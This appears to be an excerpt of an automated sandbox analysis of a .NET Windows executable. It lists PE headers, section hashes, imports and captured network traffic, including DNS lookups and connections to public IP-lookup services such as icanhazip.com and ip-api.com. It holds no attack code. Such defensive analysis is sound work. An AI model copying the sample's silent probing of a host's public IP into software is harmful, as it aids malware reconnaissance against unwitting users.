                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0xf5680x4a.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x6be.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x120000xc.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x20000xd5b80xd600e4552483185499814aa846ea5cf84428False0.3599591121495327OpenPGP Public Key5.474091517006805IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rsrc0x100000x6be0x80004c8a61356da92d3f8a2a4a962886a13False0.373046875data3.713192232392757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x120000xc0x20074cf21c98df36c56482e6954ead78eeeFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_VERSION0x100a00x434data0.43215613382899626
                    RT_MANIFEST0x104d40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                    Imports

                    DLLImport
                    mscoree.dll_CorExeMain

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jun 24, 2024 16:50:49.361504078 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:49.361555099 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:49.361639023 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:49.364950895 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:49.365010023 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:49.842924118 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:49.843144894 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:49.847968102 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:49.848006010 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:49.848567009 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:49.963933945 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.008522034 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.404618979 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.404681921 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.404766083 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.404804945 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.404933929 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.404978037 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.404987097 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.405292034 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.405335903 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.405353069 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.405515909 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.405559063 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.405566931 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.406115055 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.406162977 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.406172037 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.406605005 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.406644106 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.406733036 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.409387112 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.491154909 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.491224051 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.491235018 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.491246939 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.491297960 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.491307020 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.491812944 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.491858006 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.491858959 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.491875887 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.491909981 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.491921902 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.492424011 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.492474079 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.492490053 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.492695093 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.492738962 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.492743015 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.492753029 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.492790937 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.493258953 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.493328094 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.493375063 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.493382931 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.493864059 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.493906975 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.493957996 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.493973970 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.494021893 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.494501114 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.494571924 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.494621038 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.494628906 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.495070934 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.495115995 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.495120049 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.495130062 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.495167971 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.495176077 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.495780945 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.495839119 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.495846033 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.579054117 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.579122066 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.579185009 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.579220057 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.579241037 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.579252958 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.580005884 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.580054998 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.580065012 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.580070972 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.580080032 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.580094099 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.580909967 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.580964088 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.580972910 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.581434011 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.581487894 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.581505060 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.582421064 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.582468987 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.582470894 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.582484007 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.582510948 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.583523035 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.583564997 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.583578110 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.583585978 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.583600044 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.584414959 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.584479094 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.584491968 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.585418940 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.585474014 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.585498095 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.585506916 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.585520029 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.586273909 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.586322069 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.586338997 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.586347103 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.586360931 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.586388111 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.587234974 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.587338924 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.665693998 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.665864944 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.666007042 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.666141033 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.666743994 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.666788101 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.666809082 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.666829109 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.666846037 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.667375088 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.667418957 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.667428970 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.667438030 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.667462111 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.668092012 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.668143034 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.668153048 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.668900013 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.668941021 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.668950081 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.668957949 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.668987036 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.669591904 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.669639111 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.669648886 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.670480013 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.670526981 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.670533895 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.670542955 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.670572996 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.671298027 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.671336889 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.671346903 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.671355009 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.671380997 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.672200918 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.672246933 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.672260046 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.672275066 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.672290087 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.673037052 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.673089981 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.673105955 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.673732996 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.673791885 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.673794031 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.673808098 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.673840046 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.674689054 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.674736023 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.674736977 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.674751043 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.674782038 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.674793959 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.674834013 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.674844027 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.675672054 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.675713062 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.675715923 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.675725937 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.675755024 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.677644968 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.677675962 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.677701950 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.677711010 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.677725077 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.677736998 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.753241062 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.753276110 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.753314018 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.753353119 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.753372908 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.755291939 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.755321026 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.755346060 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.755358934 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.755373955 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.755377054 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.755377054 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.755399942 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.755409956 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.755423069 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.755433083 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.755475998 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.755486012 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.755587101 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.757209063 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.757241011 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.757271051 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.757280111 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.757294893 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.757344961 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.758007050 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.758063078 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.758845091 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.758893967 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.758897066 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.758910894 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.758938074 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.758953094 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.758990049 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.758999109 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.759777069 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.759825945 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.759835005 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.759888887 CEST44349164188.114.96.3192.168.2.22
                    Jun 24, 2024 16:50:50.759937048 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:50.760746956 CEST49164443192.168.2.22188.114.96.3
                    Jun 24, 2024 16:50:55.439671040 CEST4916580192.168.2.22104.16.185.241
                    Jun 24, 2024 16:50:55.444581032 CEST8049165104.16.185.241192.168.2.22
                    Jun 24, 2024 16:50:55.444634914 CEST4916580192.168.2.22104.16.185.241
                    Jun 24, 2024 16:50:55.444897890 CEST4916580192.168.2.22104.16.185.241
                    Jun 24, 2024 16:50:55.449764967 CEST8049165104.16.185.241192.168.2.22
                    Jun 24, 2024 16:50:55.915349960 CEST8049165104.16.185.241192.168.2.22
                    Jun 24, 2024 16:50:56.124316931 CEST8049165104.16.185.241192.168.2.22
                    Jun 24, 2024 16:50:56.124460936 CEST4916580192.168.2.22104.16.185.241
                    Jun 24, 2024 16:51:02.148525953 CEST4916580192.168.2.22104.16.185.241
                    Jun 24, 2024 16:51:02.153911114 CEST8049165104.16.185.241192.168.2.22
                    Jun 24, 2024 16:51:02.154553890 CEST4916580192.168.2.22104.16.185.241
                    Jun 24, 2024 16:51:02.171993971 CEST4916680192.168.2.22208.95.112.1
                    Jun 24, 2024 16:51:02.176996946 CEST8049166208.95.112.1192.168.2.22
                    Jun 24, 2024 16:51:02.177130938 CEST4916680192.168.2.22208.95.112.1
                    Jun 24, 2024 16:51:02.177234888 CEST4916680192.168.2.22208.95.112.1
                    Jun 24, 2024 16:51:02.187647104 CEST8049166208.95.112.1192.168.2.22
                    Jun 24, 2024 16:51:02.649985075 CEST8049166208.95.112.1192.168.2.22
                    Jun 24, 2024 16:51:02.864099026 CEST8049166208.95.112.1192.168.2.22
                    Jun 24, 2024 16:51:02.864176989 CEST4916680192.168.2.22208.95.112.1
                    Jun 24, 2024 16:51:08.130481958 CEST4916680192.168.2.22208.95.112.1
                    Jun 24, 2024 16:51:08.136094093 CEST8049166208.95.112.1192.168.2.22
                    Jun 24, 2024 16:51:08.136162043 CEST4916680192.168.2.22208.95.112.1
                    Jun 24, 2024 16:51:08.175009012 CEST49167443192.168.2.22188.114.97.3
                    Jun 24, 2024 16:51:08.175039053 CEST44349167188.114.97.3192.168.2.22
                    Jun 24, 2024 16:51:08.175280094 CEST49167443192.168.2.22188.114.97.3
                    Jun 24, 2024 16:51:08.251812935 CEST49167443192.168.2.22188.114.97.3
                    Jun 24, 2024 16:51:08.251832008 CEST44349167188.114.97.3192.168.2.22
                    Jun 24, 2024 16:51:08.730282068 CEST44349167188.114.97.3192.168.2.22
                    Jun 24, 2024 16:51:08.730396032 CEST49167443192.168.2.22188.114.97.3
                    Jun 24, 2024 16:51:08.868691921 CEST49167443192.168.2.22188.114.97.3
                    Jun 24, 2024 16:51:08.868727922 CEST44349167188.114.97.3192.168.2.22
                    Jun 24, 2024 16:51:08.869847059 CEST44349167188.114.97.3192.168.2.22
                    Jun 24, 2024 16:51:08.882181883 CEST49167443192.168.2.22188.114.97.3
                    Jun 24, 2024 16:51:08.882350922 CEST49167443192.168.2.22188.114.97.3
                    Jun 24, 2024 16:51:08.882522106 CEST44349167188.114.97.3192.168.2.22
                    Jun 24, 2024 16:51:08.882620096 CEST49167443192.168.2.22188.114.97.3
                    Jun 24, 2024 16:51:08.882780075 CEST44349167188.114.97.3192.168.2.22
                    Jun 24, 2024 16:51:09.367986917 CEST44349167188.114.97.3192.168.2.22
                    Jun 24, 2024 16:51:09.368072033 CEST44349167188.114.97.3192.168.2.22
                    Jun 24, 2024 16:51:09.368119955 CEST49167443192.168.2.22188.114.97.3
                    Jun 24, 2024 16:51:09.368769884 CEST49167443192.168.2.22188.114.97.3

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jun 24, 2024 16:50:49.340115070 CEST5789353192.168.2.228.8.8.8
                    Jun 24, 2024 16:50:49.355318069 CEST53578938.8.8.8192.168.2.22
                    Jun 24, 2024 16:50:55.421560049 CEST5482153192.168.2.228.8.8.8
                    Jun 24, 2024 16:50:55.431735039 CEST53548218.8.8.8192.168.2.22
                    Jun 24, 2024 16:50:57.039324045 CEST5471953192.168.2.228.8.8.8
                    Jun 24, 2024 16:50:57.046508074 CEST53547198.8.8.8192.168.2.22
                    Jun 24, 2024 16:51:02.159045935 CEST4988153192.168.2.228.8.8.8
                    Jun 24, 2024 16:51:02.170931101 CEST53498818.8.8.8192.168.2.22
                    Jun 24, 2024 16:51:08.142549992 CEST5499853192.168.2.228.8.8.8
                    Jun 24, 2024 16:51:08.160586119 CEST53549988.8.8.8192.168.2.22
                    Jun 24, 2024 16:51:08.161233902 CEST5499853192.168.2.228.8.8.8
                    Jun 24, 2024 16:51:08.174427986 CEST53549988.8.8.8192.168.2.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jun 24, 2024 16:50:49.340115070 CEST192.168.2.228.8.8.80xd6cdStandard query (0)whatismyipaddressnow.coA (IP address)IN (0x0001)false
                    Jun 24, 2024 16:50:55.421560049 CEST192.168.2.228.8.8.80xc702Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                    Jun 24, 2024 16:50:57.039324045 CEST192.168.2.228.8.8.80x432cStandard query (0)90.168.9.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                    Jun 24, 2024 16:51:02.159045935 CEST192.168.2.228.8.8.80xfe5Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                    Jun 24, 2024 16:51:08.142549992 CEST192.168.2.228.8.8.80x3d23Standard query (0)whatismyipaddressnow.coA (IP address)IN (0x0001)false
                    Jun 24, 2024 16:51:08.161233902 CEST192.168.2.228.8.8.80x3d23Standard query (0)whatismyipaddressnow.coA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jun 24, 2024 16:50:49.355318069 CEST8.8.8.8192.168.2.220xd6cdNo error (0)whatismyipaddressnow.co188.114.96.3A (IP address)IN (0x0001)false
                    Jun 24, 2024 16:50:49.355318069 CEST8.8.8.8192.168.2.220xd6cdNo error (0)whatismyipaddressnow.co188.114.97.3A (IP address)IN (0x0001)false
                    Jun 24, 2024 16:50:55.431735039 CEST8.8.8.8192.168.2.220xc702No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
